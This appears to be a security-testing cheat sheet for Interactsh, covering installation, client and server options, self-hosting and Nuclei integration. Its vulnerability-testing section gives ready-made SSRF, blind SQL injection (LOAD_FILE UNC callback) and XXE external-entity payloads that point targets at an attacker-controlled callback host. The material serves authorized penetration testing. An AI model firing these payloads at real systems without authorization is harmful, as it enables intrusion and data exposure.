
Interactsh OOB Interaction Gathering Cheat Sheet

Overview

Interactsh is an open-source tool developed by Project Discovery for detecting out-of-band (OOB) interactions. It's designed to identify vulnerabilities that cause external interactions, such as Server-Side Request Forgery (SSRF), Blind SQL Injection, XML External Entity (XXE) Injection, and other vulnerabilities that may not be immediately visible through traditional testing methods.

What makes Interactsh unique is its comprehensive approach to OOB testing. Unlike other tools that focus on specific protocols, Interactsh can detect interactions across multiple protocols, including DNS, HTTP(S), SMTP(S), and LDAP. It consists of both a server component that captures and logs these interactions and a client component that generates unique testing URLs and monitors for any interactions with those URLs.

Interactsh is widely used in security testing to identify vulnerabilities that might otherwise go undetected. It's particularly valuable for bug bounty hunters, penetration testers, and security researchers who need to verify the existence of vulnerabilities that rely on external interactions. The tool is also integrated with Nuclei, another Project Discovery tool, enabling automated vulnerability scanning with OOB detection capabilities.

Installation

Client Installation

Using Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

# Verify installation
interactsh-client -version

Using Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh client using Docker
docker run -it projectdiscovery/interactsh:latest client -h

Using Homebrew (macOS)

# Install using Homebrew
brew install interactsh-client

# Verify installation
interactsh-client -version

Using PDTM (Project Discovery Tools Manager)

# Install PDTM first if not already installed
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest

# Install Interactsh client using PDTM
pdtm -i interactsh-client

# Verify installation
interactsh-client -version

Server Installation (Self-Hosted)

Using Go

# Install using Go (requires Go 1.20 or later)
go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-server@latest

# Verify installation
interactsh-server -version

Using Docker

# Pull the latest Docker image
docker pull projectdiscovery/interactsh:latest

# Run Interactsh server using Docker
docker run -it projectdiscovery/interactsh:latest server -h

Basic Usage

Client Usage

# Start the client with default settings
interactsh-client

# Start the client with verbose output
interactsh-client -v

# Start the client with a specific server
interactsh-client -server your-interactsh-server.com

Server Usage (Self-Hosted)

# Start the server with default settings
interactsh-server

# Start the server with a specific domain
interactsh-server -domain your-domain.com

# Start the server with verbose output
interactsh-server -v

Output Options

# Save interactions to a file
interactsh-client -o interactions.log

# Output in JSON format
interactsh-client -json -o interactions.json

# Silent mode (no banner)
interactsh-client -silent
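
The file written by `-json -o interactions.json` can be triaged per payload to separate DNS-only callbacks from callbacks where the target actually connected. This Python script is an added example, not part of Interactsh or the original cheat sheet; the field names (`protocol`, `unique-id`) are assumed from the client's JSON output, and the sample records, ids and `PAYLOADS` mapping are constructed.

```python
import json
from collections import defaultdict

# Constructed sample of `interactsh-client -json` output (one JSON object per line).
# Field names are assumed from the client's JSON format; all values are made up.
SAMPLE = """\
{"protocol":"dns","unique-id":"aaaa1111","full-id":"aaaa1111","q-type":"A","remote-address":"192.0.2.53","timestamp":"2024-01-01T10:00:00Z"}
{"protocol":"http","unique-id":"aaaa1111","full-id":"aaaa1111","remote-address":"198.51.100.7","timestamp":"2024-01-01T10:00:01Z"}
{"protocol":"dns","unique-id":"bbbb2222","full-id":"xxe.bbbb2222","q-type":"A","remote-address":"192.0.2.53","timestamp":"2024-01-01T10:02:00Z"}
not-json banner line
"""

# Hypothetical mapping kept by the tester: payload id -> where it was injected.
PAYLOADS = {
    "aaaa1111": "GET /fetch?url=",
    "bbbb2222": "POST /api (XXE)",
    "cccc3333": "GET /search?id=",
}

def parse(lines):
    """Yield interaction dicts, skipping blank, banner or malformed lines."""
    for line in lines:
        line = line.strip()
        if not line.startswith("{"):
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue
        if "protocol" in rec and "unique-id" in rec:
            yield rec

def triage(lines, payloads):
    """Return {payload id: verdict} for every payload that was sent."""
    seen = defaultdict(set)
    for rec in parse(lines):
        seen[rec["unique-id"]].add(rec["protocol"].lower())
    verdicts = {}
    for pid in payloads:
        protos = seen.get(pid, set())
        if protos - {"dns"}:
            verdicts[pid] = "confirmed"       # something connected to the server
        elif protos:
            verdicts[pid] = "dns-only"        # name was resolved only: weaker evidence
        else:
            verdicts[pid] = "no-interaction"
    return verdicts

if __name__ == "__main__":
    for pid, verdict in triage(SAMPLE.splitlines(), PAYLOADS).items():
        print(f"{pid}  {PAYLOADS[pid]:<18} {verdict}")
```

A `dns-only` verdict is the case the Troubleshooting section points at: the name was resolved but no other protocol reached the server, so outbound traffic may be filtered.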

Client Configuration

Basic Configuration

# Set polling interval (seconds)
interactsh-client -poll-interval 5

# Set interaction timeout (seconds)
interactsh-client -interaction-timeout 60

# Enable persistent session
interactsh-client -persistent-session

# Use a specific correlation ID
interactsh-client -correlation-id your-correlation-id

Authentication

# Use token for authentication
interactsh-client -token your-auth-token

# Use a specific server with token
interactsh-client -server your-interactsh-server.com -token your-auth-token

Filtering

# Filter interactions by type
interactsh-client -filter-type dns,http

# Filter interactions by IP
interactsh-client -filter-ip 1.2.3.4

# Filter interactions by content
interactsh-client -filter-content "admin"

Server Configuration (Self-Hosted)

Domain Configuration

# Set domain for the server
interactsh-server -domain your-domain.com

# Set wildcard domain
interactsh-server -domain your-domain.com -wildcard

# Set IP address to listen on
interactsh-server -ip 1.2.3.4

Certificate Configuration

# Use Let's Encrypt for certificates
interactsh-server -domain your-domain.com -letsencrypt

# Use custom certificates
interactsh-server -domain your-domain.com -cert cert.pem -key key.pem

Authentication Configuration

# Enable authentication
interactsh-server -auth

# Set token for authentication
interactsh-server -auth-token your-auth-token

# Set token file for authentication
interactsh-server -auth-token-file tokens.txt

Advanced Usage

Client Advanced Features

# Generate a specific number of URLs
interactsh-client -n 5

# Generate URLs with a specific payload
interactsh-client -payload-template "{{random}}.your-domain.com"

# Enable DNS callback only
interactsh-client -dns-only

# Enable HTTP callback only
interactsh-client -http-only

# Enable SMTP callback only
interactsh-client -smtp-only

Server Advanced Features

# Enable specific services
interactsh-server -dns -http -smtp -ldap

# Disable specific services
interactsh-server -no-dns -no-http -no-smtp -no-ldap

# Set custom ports
interactsh-server -dns-port 53 -http-port 80 -https-port 443 -smtp-port 25 -smtps-port 587 -ldap-port 389

# Enable metrics
interactsh-server -metrics

Payload Generation

# Generate a URL for testing
interactsh-client -generate-url

# Generate multiple URLs
interactsh-client -generate-url -n 5

# Generate URL with specific server
interactsh-client -generate-url -server your-interactsh-server.com

Integration with Other Tools

Integration with Nuclei

# Use Interactsh with Nuclei
nuclei -u https://example.com -t nuclei-templates/

# Use a specific Interactsh server with Nuclei
nuclei -u https://example.com -t nuclei-templates/ -interactsh-server your-interactsh-server.com

# Disable Interactsh in Nuclei
nuclei -u https://example.com -t nuclei-templates/ -no-interactsh

Integration with Notify

# Send Interactsh interactions to Discord
interactsh-client|notify -provider discord

# Send filtered interactions to Slack
interactsh-client -filter-type http|notify -provider slack

Integration with Custom Scripts

#!/bin/bash
# Use Interactsh in a bash script
URL=$(interactsh-client -generate-url)
curl -s "https://example.com/test?url=$URL"
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing Vulnerabilities

Testing SSRF

# Generate a URL for SSRF testing
URL=$(interactsh-client -generate-url)

# Use the URL in a potential SSRF vulnerability
curl -s "https://example.com/fetch?url=http://$URL/test"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing Blind SQL Injection

# Generate a URL for Blind SQL Injection testing
URL=$(interactsh-client -generate-url)

# Use the URL in a SQL query
curl -s "https://example.com/search?id=1' UNION SELECT LOAD_FILE(CONCAT('\\\\',$URL,'\\share'))"

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Testing XXE Injection

# Generate a URL for XXE testing
URL=$(interactsh-client -generate-url)

# Create an XML payload with XXE
cat > xxe.xml << EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://$URL/xxe">
]>
<foo>&xxe;</foo>
EOF

# Send the XML payload
curl -s -X POST -d @xxe.xml -H "Content-Type: application/xml" https://example.com/api

# Monitor for interactions
interactsh-client -poll-interval 5 -interaction-timeout 30

Troubleshooting

Common Issues

  1. No Interactions Detected

     ```bash
     # Increase polling interval
     interactsh-client -poll-interval 10

     # Increase interaction timeout
     interactsh-client -interaction-timeout 120

     # Check if the target is behind a firewall
     # Try using different protocols (DNS, HTTP, SMTP)
     ```

  2. Connection Issues

     ```bash
     # Check if the server is reachable
     ping your-interactsh-server.com

     # Try a different server
     interactsh-client -server oast.pro

     # Check if your network allows outbound connections
     ```

  3. Authentication Issues

     ```bash
     # Verify token
     interactsh-client -server your-interactsh-server.com -token your-auth-token -v

     # Check if the server requires authentication
     ```

  4. Server Setup Issues

     ```bash
     # Check DNS configuration
     dig ns your-domain.com

     # Verify that your domain's nameservers point to your server
     # Ensure that your server has the necessary ports open
     ```

Debugging

# Enable verbose mode for client
interactsh-client -v

# Enable debug mode for client
interactsh-client -debug

# Enable verbose mode for server
interactsh-server -v

# Enable debug mode for server
interactsh-server -debug

Self-Hosting Guide

DNS Configuration

To self-host Interactsh, you need to configure your domain's DNS settings:

  1. Register a domain (e.g., your-domain.com)
  2. Set up NS records for your domain to point to your server:
       your-domain.com. IN NS ns1.your-domain.com.
       your-domain.com. IN NS ns2.your-domain.com.
  3. Set up A records for your nameservers:
       ns1.your-domain.com. IN A your-server-ip
       ns2.your-domain.com. IN A your-server-ip

Server Setup

# Start the server with your domain
interactsh-server -domain your-domain.com

# Enable Let's Encrypt for HTTPS
interactsh-server -domain your-domain.com -letsencrypt

# Enable authentication
interactsh-server -domain your-domain.com -auth -auth-token your-auth-token

Docker Deployment

# Create a docker-compose.yml file
cat > docker-compose.yml << EOF
version: '3'
services:
  interactsh-server:
    image: projectdiscovery/interactsh:latest
    command: server -domain your-domain.com -letsencrypt -auth -auth-token your-auth-token
    ports:
      - "53:53/udp"
      - "80:80"
      - "443:443"
      - "25:25"
      - "587:587"
      - "389:389"
    restart: always
EOF

# Start the server
docker-compose up -d

Configuration

Client Configuration File

Interactsh client uses a configuration file located at $HOME/.config/interactsh-client/config.yaml. You can customize various settings in this file:

# Example configuration file
server: oast.pro
token: your-auth-token
poll-interval: 5
interaction-timeout: 60
filter-type: dns,http

Server Configuration File

Interactsh server uses a configuration file located at $HOME/.config/interactsh-server/config.yaml. You can customize various settings in this file:

# Example configuration file
domain: your-domain.com
ip: 1.2.3.4
letsencrypt: true
auth: true
auth-token: your-auth-token

Environment Variables

# Set Interactsh client configuration via environment variables
export INTERACTSH_SERVER=oast.pro
export INTERACTSH_TOKEN=your-auth-token
export INTERACTSH_POLL_INTERVAL=5
export INTERACTSH_INTERACTION_TIMEOUT=60

# Set Interactsh server configuration via environment variables
export INTERACTSH_DOMAIN=your-domain.com
export INTERACTSH_IP=1.2.3.4
export INTERACTSH_LETSENCRYPT=true
export INTERACTSH_AUTH=true
export INTERACTSH_AUTH_TOKEN=your-auth-token

Reference

Client Command Line Options

Flag                  Description
-server               Interactsh server to use
-token                Authentication token for the server
-n                    Number of URLs to generate
-o, -output           File to write output to
-json                 Write output in JSON format
-v, -verbose          Show verbose output
-debug                Show debug information
-poll-interval        Polling interval in seconds
-interaction-timeout  Interaction timeout in seconds
-persistent-session   Enable persistent session
-correlation-id       Correlation ID for the session
-filter-type          Filter interactions by type (dns, http, smtp, ldap)
-filter-ip            Filter interactions by IP
-filter-content       Filter interactions by content
-generate-url         Generate URL for testing
-dns-only             Enable DNS callback only
-http-only            Enable HTTP callback only
-smtp-only            Enable SMTP callback only
-ldap-only            Enable LDAP callback only
-payload-template     Custom payload template
-version              Show Interactsh client version

Server Command Line Options

Flag              Description
-domain           Domain to use for the server
-ip               IP address to listen on
-wildcard         Enable wildcard domain
-letsencrypt      Use Let's Encrypt for certificates
-cert             Path to certificate file
-key              Path to key file
-auth             Enable authentication
-auth-token       Authentication token
-auth-token-file  File containing authentication tokens
-dns              Enable DNS service
-http             Enable HTTP service
-smtp             Enable SMTP service
-ldap             Enable LDAP service
-no-dns           Disable DNS service
-no-http          Disable HTTP service
-no-smtp          Disable SMTP service
-no-ldap          Disable LDAP service
-dns-port         Port for DNS service
-http-port        Port for HTTP service
-https-port       Port for HTTPS service
-smtp-port        Port for SMTP service
-smtps-port       Port for SMTPS service
-ldap-port        Port for LDAP service
-metrics          Enable metrics
-v, -verbose      Show verbose output
-debug            Show debug information
-version          Show Interactsh server version

Supported Interaction Types

Type  Description
dns   DNS interactions
http  HTTP/HTTPS interactions
smtp  SMTP/SMTPS interactions
ldap  LDAP interactions


This cheat sheet provides a comprehensive reference for using Interactsh, from basic client and server usage to advanced configuration and integration with other tools. For the most up-to-date information, always refer to the official documentation.